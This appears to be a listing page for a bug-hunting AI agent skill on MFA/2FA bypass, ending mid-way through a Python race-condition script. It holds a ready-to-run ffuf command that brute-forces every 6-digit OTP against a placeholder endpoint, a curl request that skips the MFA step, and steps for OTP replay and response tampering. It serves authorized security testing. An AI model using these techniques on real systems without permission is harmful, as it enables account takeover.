← ClaudeAtlas

hunt-mfa-bypasslisted

Hunt MFA / 2FA bypass — 7 distinct patterns. (1) MFA not enforced on sensitive endpoints (password change, email change accept without MFA challenge), (2) MFA-step skip via direct navigation to post-login URL, (3) MFA-token replay (same code accepted twice), (4) brute-force the 6-digit OTP without rate limit (10^6 attempts at server speed), (5) race condition on OTP validation, (6) recovery-code dump via /api/me, (7) backup factor downgrade (SMS factor with no rate limit). Plus the chain: cookie theft + password oracle + no step-up = ATO without MFA challenge. Detection: trace auth flow in Burp, find every state transition, check if MFA is middleware-gated vs per-endpoint, check OTP entropy and rate limit on OTP-validate. Validate: attacker session reaching post-MFA state. Use when hunting auth bypass, MFA flows, chaining primitives toward ATO.
elementalsouls/Claude-BugHunter · ★ 1,478 · API & Backend · score 83
Install: claude install-skill elementalsouls/Claude-BugHunter
## 19. MFA / 2FA BYPASS > Growing bug class — 7 distinct patterns. Pays High/Critical when it enables ATO without prior session. ### Pattern 1: No Rate Limit on OTP ```bash # Test with ffuf — all 1M 6-digit codes ffuf -u "https://target.com/api/verify-otp" \ -X POST -H "Content-Type: application/json" \ -H "Cookie: session=YOUR_SESSION" \ -d '{"otp":"FUZZ"}' \ -w <(seq -w 000000 999999) \ -fc 400,429 -t 5 # -t 5 (slow down) — aggressive rates get 429 or ban ``` ### Pattern 2: OTP Not Invalidated After Use ``` 1. Login → receive OTP "123456" → enter it → success 2. Logout → login again with same credentials 3. Try OTP "123456" again 4. If accepted → OTP never invalidated = ATO (attacker sniffs OTP once, reuses forever) ``` ### Pattern 3: Response Manipulation ``` 1. Enter wrong OTP → capture response in Burp 2. Change {"success":false} → {"success":true} (or 401 → 200) 3. Forward → if app proceeds → client-side only MFA check ``` ### Pattern 4: Skip MFA Step (Workflow Bypass) ```bash # After entering password, app sets a "pre-mfa" cookie → redirects to /mfa # Test: skip /mfa entirely, access /dashboard directly with pre-mfa cookie # If app grants access without MFA = auth flow bypass = Critical curl -s -b "session=PRE_MFA_SESSION" https://target.com/dashboard ``` ### Pattern 5: Race on MFA Verification ```python import asyncio, aiohttp async def verify(session, otp): async with session.post("https://target.com/api/mfa/verify", js